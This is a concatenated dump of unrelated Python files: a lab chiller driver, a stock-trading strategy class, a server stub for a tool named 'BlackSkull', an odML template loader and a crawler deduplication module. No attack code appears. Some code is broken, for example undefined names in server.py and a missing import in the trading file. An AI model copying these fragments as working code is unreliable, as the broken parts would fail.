SET_TEMP_LIM_LO = {"name": "OUT_SP_04", "type": float, "check": {"min": -40, "max": 19}} # Get value from external flowrate sensor GET_EXT_FLOWRATE = {"name": "IN_SP_08", "reply": {"type": float}} # Get temperature difference between working and safety sensor GET_TEMP_DELTA = {"name": "IN_PAR_00", "reply": {"type": float}} # Get time constant for external bath GET_BATH_TE_EXT = {"name": "IN_PAR_01", "reply": {"type": float}} # Get internal slope GET_SI = {"name": "IN_PAR_02", "reply": {"type": float}} # Time constant for internal bath GET_BATH_TE_INT = {"name": "IN_PAR_03", "reply": {"type": float}} # Get bath temperature band limit GET_BATH_BAND_LIMIT = {"name": "IN_PAR_04", "reply": {"type": 
float}} # Get self-tuning mode. 0 - off; 1 - once; 2 - always GET_SELFTUNE_MODE = {"name": "IN_MODE_02", "reply": {"type": int}} # Get type of ext programmer input. GET_EXTPROG_MODE = {"name": "IN_MODE_03", "reply": {"type": int}} # Get/set temperature control mode. 0 - internal; 1 - external. GET_TEMP_REG_MODE = {"name": "IN_MODE_04", "reply": {"type": int}} # Set temperature regulation mode SET_TEMP_REG_MODE = {"name": "OUT_MODE_04", "type": int, "check": {"values": REGULATION_MODES}} # Get control dynamics mode. 0 - aperiodic; 1 - standard GET_DYN_MODE = {"name": "IN_MODE_08", "reply": {"type": int}} # ################### Configuration commands ############################# # Get/set temperature setpoint to use (SP1..SP3) SET_TEMP_SP = {"name": "OUT_MODE_01", "type": int, "check": {"values": SETPOINT_MODES}} GET_TEMP_SP = {"name": "IN_MODE_01", "reply": {"type": int}} # Set self-tune mode SET_SELFTUNE_MODE = {"name": "OUT_MODE_02", "type": int, "check": {"values": SELFTUNE_MODES}} # Set external programmer mode SET_EXTPROG_MODE = {"name": "OUT_MODE_03", "type": int, "check": {"values": EXTPROG_MODES}} # Set manipulated variable for the heater via serial interface SET_HEATER_VALUE = {"name": "OUT_SP_06", "type": int, "check": {"min": -100, "max": 100}} # Set cospeed for external control SET_COSPEED_EXT = {"name": "OUT_PAR_04", "type": float, "check": {"min": 0, "max": 5}} # Set control dynamics mode SET_CONTROL_MODE = {"name": "OUT_MODE_08", "type": int, "check": {"values": CONTROL_DYNAMCIS_MODES}} # Get setpoint temperature of external programmer GET_TEMP_EXTPROG = {"name": "IN_SP_05", "reply": {"type": float}} # Get temperature indication: 0-°C, 1-°F GET_TEMP_UNITS = {"name": "IN_SP_06", "reply": {"type": float}} # Get pk/ph0 factor (ratio between max cooling and max heating capacity) GET_PKPH0 = {"name": "IN_PAR_05", "reply": {"type": float}} # Get/set Xp control parameter of the internal controller GET_XP_INT = {"name": "IN_PAR_06", "reply": {"type": float}} 
SET_XP_INT = {"name": "OUT_PAR_06", "type": float, "check": {"min": 0.1, "max": 99.9}} # Get/set Tn control parameter of the internal controller GET_TN_INT = {"name": "IN_PAR_07", "reply": {"type": int}} SET_TN_INT = {"name": "OUT_PAR_07", "type": int, "check": {"min": 3, "max": 9999}} # Get/set Tv control parameter of the internal controller GET_TV_INT = {"name": "IN_PAR_08", "reply": {"type": int}} SET_TV_INT = {"name": "OUT_PAR_08", "type": int, "check": {"min": 0, "max": 999}} # Get/set Xp control parameter of the cascaded controller GET_XP_CAS = {"name": "IN_PAR_09", "reply": {"type": float}} SET_XP_CAS = {"name": "OUT_PAR_09", "type": float, "check": {"min": 0.1, "max": 99.9}} # Get/set proportional coefficient of the cascaded controller GET_PROP_CAS = {"name": "IN_PAR_10", "reply": {"type": float}} SET_PROP_CAS = {"name": "OUT_PAR_10", "type": float, "check": {"min": 1, "max": 99.9}} # Get/set Tn control parameter of the cascaded controller GET_TN_CAS = {"name": "IN_PAR_11", "reply": {"type": int}} SET_TN_CAS = {"name": "OUT_PAR_11", "type": int, "check": {"min": 3, "max": 9999}} # Get/set Tn control parameter of the cascaded controller GET_TV_CAS = {"name": "IN_PAR_12", "reply": {"type": int}} SET_TV_CAS = {"name": "OUT_PAR_12", "type": int, "check": {"min": 0, "max": 999}} # Get/set adjusted maximum internal temperature for the cascaded controller GET_TEMP_CAS_MAX = {"name": "IN_PAR_13", "reply": {"type": float}} SET_TEMP_CAS_MAX = {"name": "OUT_PAR_13", "type": float} # Get/set adjusted minimum internal temperature for the cascaded controller GET_TEMP_CAS_MIN = {"name": "IN_PAR_14", "reply": {"type": float}} SET_TEMP_CAS_MIN = {"name": "OUT_PAR_14", "type": float} # Get/set upper band limit GET_BAND_LIM_HI = {"name": "IN_PAR_15", "reply": {"type": int}} SET_BAND_LIM_HI = {"name": "OUT_PAR_15", "type": int, "check": {"min": 0, "max": 200}} # Get/set lower band limit GET_BAND_LIM_LO = {"name": "IN_PAR_16", "reply": {"type": int}} SET_BAND_LIM_LO = {"name": 
"OUT_PAR_16", "type": int, "check": {"min": 0, "max": 200}} class CF41Chiller(AbstractTemperatureController): """ This provides a Python class for the Julabo CF41 chiller based on the the original operation manual 1.951.4871-V3 11/15 26.11.15 """ def __init__(self, device_name: str, connection_mode: str, address: Optional[str], port: Union[str, int]): """Default constructor """ self.cmd = CF41ChillerCommands # Serial connection settings - p.71 of the manual connection_parameters: ConnectionParameters = {} connection_parameters["port"] = port connection_parameters["address"] = address connection_parameters["baudrate"] = 9600 connection_parameters["bytesize"] = serial.SEVENBITS connection_parameters["parity"] = serial.PARITY_EVEN connection_parameters["rtscts"] = True connection_parameters["command_delay"] = 0.3 # Protocol settings self.command_terminator = "\r\n" self.reply_terminator = "\r\n" self.args_delimiter = " " super().__init__(device_name, connection_mode, connection_parameters) def initialize_device(self): """This chiller doesn't have initialization method. """ @in_simulation_device_returns("00") # Stopped, no error def get_status(self) -> str: """Gets chiller status. """ return self.send(self.cmd.GET_STATUS) def check_errors(self): """Checks device for errors. """ status = self.get_status() # All OK if status in self.cmd.STATUSES: self.logger.debug("get_status()::status: <%s>", self.cmd.STATUSES[status]) return # Warning if status in self.cmd.WARNINGS: self.logger.warning("Warning! %s", self.cmd.WARNINGS[status]) return # Critical error if status in self.cmd.ERRORS: self.logger.error("Critical error: %s", self.cmd.ERRORS[status]) raise PLDeviceInternalError(self.cmd.ERRORS[status]) errmsg = f"Unknown status {status} received from device!" self.logger.error(errmsg) raise PLDeviceReplyError(errmsg) def clear_errors(self): """Not yet implemented. 
#TODO """ raise NotImplementedError @in_simulation_device_returns(CF41ChillerCommands.DEFAULT_NAME) def is_connected(self) -> bool: """Checks if teh chiller is connected. """ try: name = self.send(self.cmd.GET_NAME) except PLConnectionError: return False return name == self.cmd.DEFAULT_NAME @in_simulation_device_returns(0) def is_idle(self) -> bool: """ Returns true if the chiller is off: pump and temperature control """ if not self.is_connected(): return False status = self.send(self.cmd.GET_CHILLER_STATE) return status == 0 def start_temperature_regulation(self): """Starts the chiller """ self.send(self.cmd.START_CHILLER) def stop_temperature_regulation(self): """Stops the chiller """ self.send(self.cmd.STOP_CHILLER) def get_regulation_mode(self) -> int: """Gets current temperature regulation mdoe. """ return self.send(self.cmd.GET_TEMP_REG_MODE) def set_regulation_mode(self, mode: int): """Sets chiller temperature regulation mode. """ # Check if we got valid mode if mode not in self.cmd.REGULATION_MODES: raise PLDeviceCommandError("Invalid regulation mode provided!") self.send(self.cmd.SET_TEMP_REG_MODE, mode) @in_simulation_device_returns("{$args[1]}") def set_temperature(self, temperature: float, sensor: int = 0): """Sets the target temperature of the chiller. Args: temperature (float): Temperature setpoint in °C. sensor (int): Specify which temperature probe the setpoint applies to. The Julabo CF41 chiller has one common setpoint temperature shared by the external and internal probe. Thus, the sensor variable has no effect here. 
""" # Check which SP is currently active setpoint_active = self.get_active_setpoint() # Choose the setpoint if setpoint_active == 0: self.send(self.cmd.SET_TEMP_SP1, temperature) elif setpoint_active == 1: self.send(self.cmd.SET_TEMP_SP2, temperature) elif setpoint_active == 2: self.send(self.cmd.SET_TEMP_SP3, temperature) else: raise PLDeviceCommandError(f"Invalid active SP <{setpoint_active}> received from the device!") @in_simulation_device_returns(0) def get_active_setpoint(self) -> int: """ Gets currently active temperature setpoint. """ return self.send(self.cmd.GET_TEMP_SP) def get_temperature(self, sensor: int = 0) -> float: """Retrieves the current temperature of the chiller. This can be the internal or external temperature, depending in what mode the chiller is currently operating. Args: sensor (int): Specify which temperature probe the setpoint applies to. """ # First, get regulation mde from the chiller mode = self.get_regulation_mode() if mode is None: # The chiller returned an invalid mode. raise PLDeviceReplyError(f"Received invalid mode '{mode}' from the chiller " f"'{self.device_name}'. Valid modes are '0' (internal " "regulation mode) and '1' (external regulation mode).") # Invalid sensor requested if sensor not in self.cmd.REGULATION_MODES.keys(): raise PLDeviceCommandError(f"Invalid sensor number {sensor} provided!" 
f"Allowed values are {self.cmd.REGULATION_MODES}") # Check if the sensor requested matches the regulation modes (0 - internal; 1 - external) # FIXME # If external probe is not connected, chiller returns "---.--" # which would throw an exception from parse_reply() when requesting external sensor reading if sensor != mode: self.logger.warning("Chiller currently operates in {mode} regulation mode, " "but the reading from sensor {sensor} ({self.cmd.REGULATION_MODES[sensor]}) was requested!") # Internal sensor temperature if sensor == 0: return self.send(self.cmd.GET_TEMP_INT) # External sensor temperature if sensor == 1: return self.send(self.cmd.GET_TEMP_EXT) @in_simulation_device_returns(0) def get_temperature_setpoint(self, sensor: int = 0) -> float: """Reads the current temperature setpoint. Args: sensor (int): Specify which temperature probe the setpoint applies to. This device uses a shared setpoint for all temperature probes. Hence, this argument has no effect here. """ # Check which SP is currently active setpoint_active = self.get_active_setpoint() if setpoint_active == 0: return self.send(self.cmd.GET_TEMP_SP1) if setpoint_active == 1: return self.send(self.cmd.GET_TEMP_SP2) if setpoint_active == 2: return self.send(self.cmd.GET_TEMP_SP3) raise PLDeviceReplyError(f"Invalid active SP <{setpoint_active}> received from the device!") # FIXME this should be refactored with new background tasks functionality def ramp_temperature(self, end_temperature: float, time: float): """Ramps chiller temperature from the current temperature to the end_temperature over time. """ if self.is_idle(): self.logger.warning("Chiller is not running! Please start the chiller before ramping the temperature.") return # Get starting temperature start_temperature = self.get_temperature() # Temperature step, degrees per minute. Can be either positive or negative. 
ramp_step = (end_temperature - start_temperature) / time # Check if the value is sane # Upon manual testing, chiller was able to reliably ramp temperature to 40 °C over 900 minutes. # This gives approximately 0.044 °C/min step # 3 decimal places would be enough to minimize the error ramp_step = round(ramp_step, 3) if ramp_step > 5.0 or ramp_step < -2.0: self.logger.error("Ramp step <%s> °C/min is too steep to ramp reliably!", ramp_step) elif abs(ramp_step) < 0.05: self.logger.error("Ramp step <%s> °C/min is very low!", ramp_step) self.logger.debug("ramp_temperature()::calculated ramp from <%s> to <%s> over <%s> minutes; step - <%s> degrees/min", start_temperature, end_temperature, time, ramp_step) ramp_thread = threading.Thread(target=self._ramp_runner, args=(start_temperature, ramp_step, end_temperature), daemon=True) ramp_thread.start() return ramp_step def _ramp_runner(self, start: float, step: float, end: float): """Worker function that actually does the ramp. """ current_temperature = start + step self.logger.info("Ramp start.") while (step > 0 and current_temperature <= end) or (step < 0 and current_temperature >= end): self.logger.info("Ramping from %s to %s, current step <%s>, %s minutes left", start, end, current_temperature, abs(round(end - current_temperature))) self.set_temperature(current_temperature) # Calculate next value current_temperature = round(current_temperature + step, 2) sleep(60) self.logger.info("Ramp end.") # Set temperature to final value self.set_temperature(end) @in_simulation_device_returns(0) def get_cooling_power(self) -> int: """Returns the value of the chiller cooling power in % """ return abs(self.send(self.cmd.GET_MAX_COOL_PWR)) def set_cooling_power(self, cooling_power: int): """Sets the value of the chiller cooling power in % """ # According to manual, "Enter the value with a preceding negative sign!" 
cooling_power = -abs(cooling_power) self.send(self.cmd.SET_MAX_COOL_PWR, cooling_power) def get_heating_power(self) -> float: """Returns the current heating power in %. """ return self.send(self.cmd.GET_HEAT_PWR) def get_heating_power_setpoint(self) -> int: """Returns the value of the heating power setpoint in % """ return self.send(self.cmd.GET_MAX_HEAT_PWR) def set_heating_power(self, heating_power: int = 100): """Sets the heating power of the chiller, in percent [10-100%]. """ heating_power = abs(heating_power) self.send(self.cmd.SET_MAX_HEAT_PWR, heating_power) def set_recirculation_pump_speed(self, speed: int): """Sets the recirculation pump speed (4 different speeds allowed). """ self.send(self.cmd.SET_PUMP_SPEED, speed) def get_recirculation_pump_speed(self) -> int: """Returns the recirculation pump speed: 1 (low flow rate) --> 4 (high flow rate) """ return self.send(self.cmd.GET_PUMP_SPEED)
qastockbase.py
# """ stock_base """ import uuid import datetime import json import os import threading import pandas as pd import pymongo from qaenv import (eventmq_ip, eventmq_password, eventmq_port, eventmq_username, mongo_ip) import QUANTAXIS as QA from QUANTAXIS.QAARP import QA_Risk, QA_User from QUANTAXIS.QAEngine.QAThreadEngine import QA_Thread from QUANTAXIS.QAUtil.QAParameter import MARKET_TYPE, RUNNING_ENVIRONMENT, ORDER_DIRECTION from QAPUBSUB.consumer import subscriber_topic from QAPUBSUB.producer import publisher_routing from QAStrategy.qactabase import QAStrategyCTABase from QIFIAccount import QIFI_Account class QAStrategyStockBase(QAStrategyCTABase): def __init__(self, code=['000001'], frequence='1min', strategy_id='QA_STRATEGY', risk_check_gap=1, portfolio='default', start='2019-01-01', end='2019-10-21', data_host=eventmq_ip, data_port=eventmq_port, data_user=eventmq_username, data_password=eventmq_password, trade_host=eventmq_ip, trade_port=eventmq_port, trade_user=eventmq_username, trade_password=eventmq_password, taskid=None, mongo_ip=mongo_ip): super().__init__(code=code, frequence=frequence, strategy_id=strategy_id, risk_check_gap=risk_check_gap, portfolio=portfolio, start=start, end=end, data_host=eventmq_ip, data_port=eventmq_port, data_user=eventmq_username, data_password=eventmq_password, trade_host=eventmq_ip, trade_port=eventmq_port, trade_user=eventmq_username, trade_password=eventmq_password, taskid=taskid, mongo_ip=mongo_ip) self.code = code def subscribe_data(self, code, frequence, data_host, data_port, data_user, data_password): """[summary] Arguments: code {[type]} -- [description] frequence {[type]} -- [description] """ self.sub = subscriber_topic(exchange='realtime_stock_{}'.format( frequence), host=data_host, port=data_port, user=data_user, password=data_password, routing_key='') for item in code: self.sub.add_sub(exchange='realtime_stock_{}'.format( frequence), routing_key=item) self.sub.callback = self.callback def upcoming_data(self, 
new_bar): """upcoming_bar : Arguments: new_bar {json} -- [description] """ self._market_data = pd.concat([self._old_data, new_bar]) # QA.QA_util_log_info(self._market_data) if self.isupdate: self.update() self.isupdate = False self.update_account() # self.positions.on_price_change(float(new_bar['close'])) self.on_bar(new_bar) def ind2str(self, ind, ind_type): z = ind.tail(1).reset_index().to_dict(orient='records')[0] return json.dumps({'topic': ind_type, 'code': self.code, 'type': self.frequence, 'data': z}) def callback(self, a, b, c, body): """在strategy的callback中,我们需要的是 1. 更新数据 2. 更新bar 3. 更新策略状态 4. 推送事件 Arguments: a {[type]} -- [description] b {[type]} -- [description] c {[type]} -- [description] body {[type]} -- [description] """ self.new_data = json.loads(str(body, encoding='utf-8')) self.running_time = self.new_data['datetime'] if float(self.new_data['datetime'][-9:]) == 0: self.isupdate = True self.acc.on_price_change(self.new_data['code'], self.new_data['close']) bar = pd.DataFrame([self.new_data]).set_index(['datetime', 'code'] ).loc[:, ['open', 'high', 'low', 'close', 'volume']] self.upcoming_data(bar) def run_sim(self): self.running_mode = 'sim' self._old_data = QA.QA_fetch_stock_min(self.code, QA.QA_util_get_last_day( QA.QA_util_get_real_date(str(datetime.date.today()))), str(datetime.datetime.now()), format='pd', frequence=self.frequence).set_index(['datetime', 'code']) self._old_data = self._old_data.loc[:, [ 'open', 'high', 'low', 'close', 'volume']] self.database = pymongo.MongoClient(mongo_ip).QAREALTIME self.client = self.database.account self.subscriber_client = self.database.subscribe self.acc = QIFI_Account( username=self.strategy_id, password=self.strategy_id, trade_host=mongo_ip) self.acc.initial() self.pub = publisher_routing(exchange='QAORDER_ROUTER', host=self.trade_host, port=self.trade_port, user=self.trade_user, password=self.trade_password) self.subscribe_data(self.code, self.frequence, self.data_host, self.data_port, self.data_user, 
self.data_password) self.add_subscriber('oL-C4w1HjuPRqTIRcZUyYR0QcLzo') self.database.strategy_schedule.job_control.update( {'strategy_id': self.strategy_id}, {'strategy_id': self.strategy_id, 'taskid': self.taskid, 'filepath': os.path.abspath(__file__), 'status': 200}, upsert=True) # threading.Thread(target=, daemon=True).start() self.sub.start() def run(self): while True: pass def get_code_marketdata(self, code): return self.market_data.loc[(slice(None), code),:] def get_current_marketdata(self): return self.market_data.loc[(self.running_time, slice(None)),:] def debug(self): self.running_mode = 'backtest' self.database = pymongo.MongoClient(mongo_ip).QUANTAXIS user = QA_User(username="admin", password='admin') port = user.new_portfolio(self.portfolio) self.acc = port.new_accountpro( account_cookie=self.strategy_id, init_cash=self.init_cash, market_type=self.market_type) #self.positions = self.acc.get_position(self.code) print(self.acc) print(self.acc.market_type) data = QA.QA_quotation(self.code, self.start, self.end, source=QA.DATASOURCE.MONGO, frequence=self.frequence, market=self.market_type, output=QA.OUTPUT_FORMAT.DATASTRUCT) def x1(item): # print(data) self._on_1min_bar() self._market_data.append(item) if str(item.name[0])[0:10] != str(self.running_time)[0:10]: if self.market_type == QA.MARKET_TYPE.STOCK_CN: print('backtest: Settle!') self.acc.settle() self.running_time = str(item.name[0]) self.on_bar(item) data.data.apply(x1, axis=1) def update_account(self): if self.running_mode == 'sim': QA.QA_util_log_info('{} UPDATE ACCOUNT'.format( str(datetime.datetime.now()))) self.accounts = self.acc.account_msg self.orders = self.acc.orders self.positions = self.acc.positions self.trades = self.acc.trades self.updatetime = self.acc.dtstr elif self.running_mode == 'backtest': #self.positions = self.acc.get_position(self.code) self.positions = self.acc.positions def send_order(self, direction='BUY', offset='OPEN', code=None, price=3925, volume=10, order_id='',): 
towards = eval('ORDER_DIRECTION.{}_{}'.format(direction, offset)) order_id = str(uuid.uuid4()) if order_id == '' else order_id if self.market_type == QA.MARKET_TYPE.STOCK_CN: """ 在此对于股票的部分做一些转换 """ if towards == ORDER_DIRECTION.SELL_CLOSE: towards = ORDER_DIRECTION.SELL elif towards == ORDER_DIRECTION.BUY_OPEN: towards = ORDER_DIRECTION.BUY if isinstance(price, float): pass elif isinstance(price, pd.Series): price = price.values[0] if self.running_mode == 'sim': QA.QA_util_log_info( '============ {} SEND ORDER =================='.format(order_id)) QA.QA_util_log_info('direction{} offset {} price{} volume{}'.format( direction, offset, price, volume)) if self.check_order(direction, offset): self.last_order_towards = {'BUY': '', 'SELL': ''} self.last_order_towards[direction] = offset now = str(datetime.datetime.now()) order = self.acc.send_order( code=code, towards=towards, price=price, amount=volume, order_id=order_id) order['topic'] = 'send_order' self.pub.pub( json.dumps(order), routing_key=self.strategy_id) self.acc.make_deal(order) self.bar_order['{}_{}'.format(direction, offset)] = self.bar_id try: for user in self.subscriber_list: QA.QA_util_log_info(self.subscriber_list) "oL-C4w2WlfyZ1vHSAHLXb2gvqiMI" """http://www.yutiansut.com/signal?user_id=oL-C4w1HjuPRqTIRcZUyYR0QcLzo&template=xiadan_report&\ strategy_id=test1&realaccount=133496&code=rb1910&order_direction=BUY&\ order_offset=OPEN&price=3600&volume=1&order_time=20190909 """ requests.post('http://www.yutiansut.com/signal?user_id={}&template={}&strategy_id={}&realaccount={}&code={}&order_direction={}&order_offset={}&price={}&volume={}&order_time={}'.format( user, "xiadan_report", self.strategy_id, self.acc.user_id, self.code.lower(), direction, offset, price, volume, now)) except Exception as e: QA.QA_util_log_info(e) else: QA.QA_util_log_info('failed in ORDER_CHECK') elif self.running_mode == 'backtest': self.bar_order['{}_{}'.format(direction, offset)] = self.bar_id self.acc.receive_simpledeal( code=code, 
trade_time=self.running_time, trade_towards=towards, trade_amount=volume, trade_price=price, order_id=order_id) #self.positions = self.acc.get_position(self.code) if __name__ == '__main__': QAStrategyStockBase(code=['000001', '000002']).run_sim()
server.py
# encoding: utf-8 from src.color import colored import socket import sys from src.Server import Server def header_program(): title = "|\t\t-~=[ BlackSkull ]=~-\t\t|" title = title.replace('\t', ' ') bar = '+' + (len(title) - 2) * "=" + '+' bar_light = '+' + (len(title) - 2) * "-" + '+' break_line = '|' + (len(title) - 2) * " " + '|' print(bar) print(title) print(bar) print(break_line) print("| Developed by: Douglas A. <alves.douglaz@gmail.com> |") print("| Version: 1.0.3 |") print(break_line) print(bar_light) print(colored("\n\n[] Server initialized...\n\n", 'green', attrs=['bold', 'reverse'])) def create_workers(): """ Create worker threads (will die when main exits) """ server = MultiServer() server.register_signal_handler() for _ in range(NUMBER_OF_THREADS): t = threading.Thread(target=work, args=(server,)) t.daemon = True t.start() return def main(): header_program() server = Server() server.start() if __name__ == '__main__': main()
templates.py
"""
Handles (deferred) loading of odML templates
"""

import os
import sys
import tempfile
import threading

try:
    import urllib.request as urllib2
    from urllib.error import URLError
    from urllib.parse import urljoin
except ImportError:
    # Python 2 fallback.
    import urllib2
    from urllib2 import URLError
    from urlparse import urljoin

from datetime import datetime as dati
from datetime import timedelta
from hashlib import md5

from .tools.parser_utils import ParserException
from .tools.xmlparser import XMLReader

REPOSITORY_BASE = 'https://templates.g-node.org/'
REPOSITORY = urljoin(REPOSITORY_BASE, 'templates.xml')

# Cached template files older than CACHE_AGE are re-downloaded.
CACHE_AGE = timedelta(days=1)
CACHE_DIR = "odml.cache"


# TODO after prototyping move functions common with
# terminologies to a common file.

def cache_load(url):
    """
    Load the url and store the file in a temporary cache directory.
    Subsequent requests for this url will use the cached version until
    the file is older than the CACHE_AGE.

    Note: download errors (ValueError, URLError) ARE re-raised here with an
    augmented message; it is the caller (TemplateHandler._load) that catches
    them to enable loading of nested odML files without breaking if one of
    the child files is unavailable.

    :param url: location of an odML template XML file.
    :return: Local file location of the requested file.
    """
    # Cache filename is the md5 of the url plus the original basename, so
    # distinct urls with the same basename never collide.
    filename = '.'.join([md5(url.encode()).hexdigest(), os.path.basename(url)])
    cache_dir = os.path.join(tempfile.gettempdir(), CACHE_DIR)

    # Create temporary folder if required
    if not os.path.exists(cache_dir):
        try:
            os.makedirs(cache_dir)
        except OSError:  # might happen due to concurrency
            if not os.path.exists(cache_dir):
                raise

    cache_file = os.path.join(cache_dir, filename)

    # (Re-)download when the cached copy is missing or stale.
    if not os.path.exists(cache_file) or dati.fromtimestamp(os.path.getmtime(cache_file)) < (dati.now() - CACHE_AGE):
        try:
            data = urllib2.urlopen(url).read()
            if sys.version_info.major > 2:
                data = data.decode("utf-8")
        except (ValueError, URLError) as exc:
            msg = "Failed to load resource from '%s': %s" % (url, exc)
            exc.args = (msg,)  # needs to be a tuple
            raise exc

        with open(cache_file, "w") as local_file:
            local_file.write(str(data))

    return cache_file


class TemplateHandler(dict):
    """
    TemplateHandler facilitates synchronous and deferred loading, caching,
    browsing and importing of full or partial odML templates.

    The handler itself is a dict mapping url -> parsed odML document.
    NOTE(review): `loading` is a class-level dict shared by all instances and
    is mutated without a lock — presumably single-threaded use apart from the
    loader threads themselves; confirm before using concurrently.
    """

    # Used for deferred loading; maps url -> loader Thread.
    loading = {}

    def browse(self, url):
        """
        Load, cache and pretty print an odML template XML file from a URL.

        :param url: location of an odML template XML file.
        :return: The odML document loaded from url.
        """
        doc = self.load(url)
        if not doc:
            raise ValueError("Failed to load resource from '%s'" % url)
        doc.pprint(max_depth=0)
        return doc

    def clone_section(self, url, section_name, children=True, keep_id=False):
        """
        Load a section by name from an odML template found at the provided URL
        and return a clone. By default it will return a clone with all child
        sections and properties as well as changed IDs for every entity.
        The named section has to be a root (direct) child of the referenced
        odML document.

        :param url: location of an odML template XML file.
        :param section_name: Unique name of the requested Section.
        :param children: Boolean whether the child entities of a Section
                         will be returned as well. Default is True.
        :param keep_id: Boolean whether all returned entities will keep
                        the original ID or have a new one assigned.
                        Default is False.
        :return: The cloned odML section loaded from url.
        """
        doc = self.load(url)
        if not doc:
            raise ValueError("Failed to load resource from '%s'" % url)

        try:
            sec = doc[section_name]
        except KeyError:
            raise KeyError("Section '%s' not found in document at '%s'" % (section_name, url))

        return sec.clone(children=children, keep_id=keep_id)

    def load(self, url):
        """
        Load and cache an odML template from a URL.

        :param url: location of an odML template XML file.
        :return: The odML document loaded from url.
        """
        # Some feedback for the user when loading large or
        # nested (include) odML files.
        print("\nLoading file %s" % url)

        if url in self:
            # Already cached in this handler.
            doc = self[url]
        elif url in self.loading:
            # A deferred load is in flight: wait for it, then retry so the
            # result is picked up from the cache (or re-loaded on failure).
            self.loading[url].join()
            self.loading.pop(url, None)
            doc = self.load(url)
        else:
            doc = self._load(url)

        return doc

    def _load(self, url):
        """
        Cache loads an odML template for a URL and returns the result as
        a parsed odML document.

        :param url: location of an odML template XML file.
        :return: The odML document loaded from url. It will silently return
                 None, if any exceptions occur to enable loading of nested
                 odML files.
        """
        try:
            local_file = cache_load(url)
        except (ValueError, URLError):
            return None

        try:
            doc = XMLReader(filename=url, ignore_errors=True).from_file(local_file)
            doc.finalize()
        except ParserException as exc:
            print("Failed to load '%s' due to parser errors:\n %s" % (url, exc))
            return None

        self[url] = doc
        return doc

    def deferred_load(self, url):
        """
        Start a background thread to load an odML template from a URL.

        :param url: location of an odML template XML file.
        """
        if url in self or url in self.loading:
            return

        self.loading[url] = threading.Thread(target=self._load, args=(url,))
        self.loading[url].start()
due.py
#!/usr/bin/env python
# NOTE(review): Python 2 module (cPickle, Queue, shelve with old-style
# dict.keys()/sort()); a port to Python 3 would touch most of this file.

import os
import cPickle
import logging
import Queue
import shelve
import time
from threading import Lock, Thread


class MemoryDue(object):
    """In-memory duplicate-URL eliminator: forwards a resource to `receiver`
    only when its (md5, batch) pair has not been seen with an equal or newer
    batch before."""

    def __init__(self, params):
        # md5 -> newest batch seen for that md5.
        self._db = {}
        self._check_lock = Lock()
        # Downstream sink; must expose put(r). Set it before calling put().
        self.receiver = None

    def put(self, r):
        """ set receiver before calling put """
        is_new = False
        self._check_lock.acquire()
        try:
            if r.md5 in self._db:
                # also compare batch
                old_batch = int(self._db[r.md5])
                new_batch = r.batch
                if new_batch > old_batch:
                    is_new = True
                else:
                    is_new = False
            else:
                is_new = True
            if is_new:
                self._db[r.md5] = r.batch
        finally:
            self._check_lock.release()
        # for performance reason, the following code is outside above critical section
        if is_new:
            self.receiver.put(r)


class DiskDue(MemoryDue):
    """Same de-dup policy as MemoryDue but persisted in a shelve file, so the
    seen-set survives restarts. Inherits put() unchanged."""

    def __init__(self, params):
        db_file = params[0]
        self._check_lock = Lock()
        # NOTE(review): `dir` shadows the builtin; harmless here but worth
        # renaming in a behavior-changing pass.
        dir = os.path.dirname(db_file)
        if not os.path.exists(dir):
            os.makedirs(dir)
        self._db = shelve.open(db_file, 'c')
        self.receiver = None


class MercatorDue(object):
    """Mercator-style duplicate eliminator: an in-memory buffer that, when
    full (or on idle), is sort-merged against a sorted on-disk file of
    (md5, batch) pairs by a background thread; only records new to both the
    buffer and the disk file are forwarded to `receiver`."""

    def __init__(self, params):
        # disk file
        self.due_dir = params[0]
        if not os.path.exists(self.due_dir):
            os.makedirs(self.due_dir)
        # Each merge writes data.<version+1> from data.<version>.
        self.file_version = 0
        # buffer
        self._buffer = {}
        self._buffer_size_limit = int(params[1])
        self._check_lock = Lock()
        self._merge_lock = Lock()
        self.receiver = None
        # state
        self.no_merge_yet = True  # protected by _check_lock
        # statistics
        self.input_count = 0  # protected by _check_lock
        self.buffer_hit_count = 0  # protected by _check_lock
        self.disk_hit_count = 0  # protected by _merge_lock
        self.passed_count = 0  # protected by _check_lock (no_merge_yet=True) and by _merge_lock (no_merge_yet=False)
        # Keep data.<n> files after merging (debugging aid).
        self.keep_file = False

    def __str__(self):
        #buffer_pct = float(len(self._buffer)) / float(self._buffer_size_limit) * 100.0
        # '!' marks a merge in progress.
        if self._merge_lock.locked():
            status_str = '!'
        else:
            status_str = ''
        return 'MercatorDue%s -- Merges:%d Buffer:%d/%d\n\tInput:%d BufferHit:%d DiskHit:%d Passed:%d' % (
            status_str,
            self.file_version,
            len(self._buffer),
            self._buffer_size_limit,
            self.input_count,
            self.buffer_hit_count,
            self.disk_hit_count,
            self.passed_count
        )

    def put(self, r):
        """Accept resource `r` (needs .md5 and .batch); forward it now or at
        merge time, depending on whether a merge has happened yet."""
        logging.debug('> %s.%d' % (r.md5, r.batch))
        self._check_lock.acquire()
        try:
            self.input_count += 1
            r.sent = False
            # first check LRU cache
            # then check buffer
            if r.md5 in self._buffer and self._buffer[r.md5].batch >= r.batch:
                # it's a dup
                self.buffer_hit_count += 1
                return
            else:
                # immediately forward when no_merge_yet = True
                # it will not be forwarded again during merging
                if self.no_merge_yet:
                    self.forward(r)
                if r.md5 in self._buffer:
                    # same md5, but later one has larger batch
                    # and will replace the previous one
                    # if it was not forwarded already, it should be considered as a buffer hit
                    if not self._buffer[r.md5].sent:
                        self.buffer_hit_count += 1
                # add new resource or replace the same one with smaller batch
                self._buffer[r.md5] = r
                # when buffer is full, merge buffer to disk file and forward unique URLs
                if len(self._buffer) >= self._buffer_size_limit:
                    # block when the previous merging is not done yet
                    while self._merge_lock.locked():
                        logging.debug('...')
                        time.sleep(1)
                    self.packing_for_merge()
        finally:
            self._check_lock.release()

    def forward(self, r):
        """
        forward passed resource
        should be protected by a Lock since it increment passed_count
        """
        if not r.sent:
            self.receiver.put(r)
            self.passed_count += 1
            r.sent = True  # make sure it will not be forwarded more than once

    def notify_idle(self):
        """ called when the system is idling """
        self._check_lock.acquire()
        try:
            if len(self._buffer) > 0:
                # skip when previous merging is not done yet
                if self._merge_lock.locked():
                    return
                self.packing_for_merge()
        finally:
            self._check_lock.release()

    def packing_for_merge(self):
        """ make sure this method is protected by self._check_lock """
        self.no_merge_yet = False
        # sort buffer by md5
        buffer_keys = self._buffer.keys()
        buffer_keys.sort()
        # make a sorted copy of the buffer
        buffer_to_merge = Queue.Queue(0)
        for k in buffer_keys:
            buffer_to_merge.put(self._buffer[k], block=False)
        # use another thread to do the merging
        t = Thread(target=self.merge_check, args=[buffer_to_merge])
        t.start()
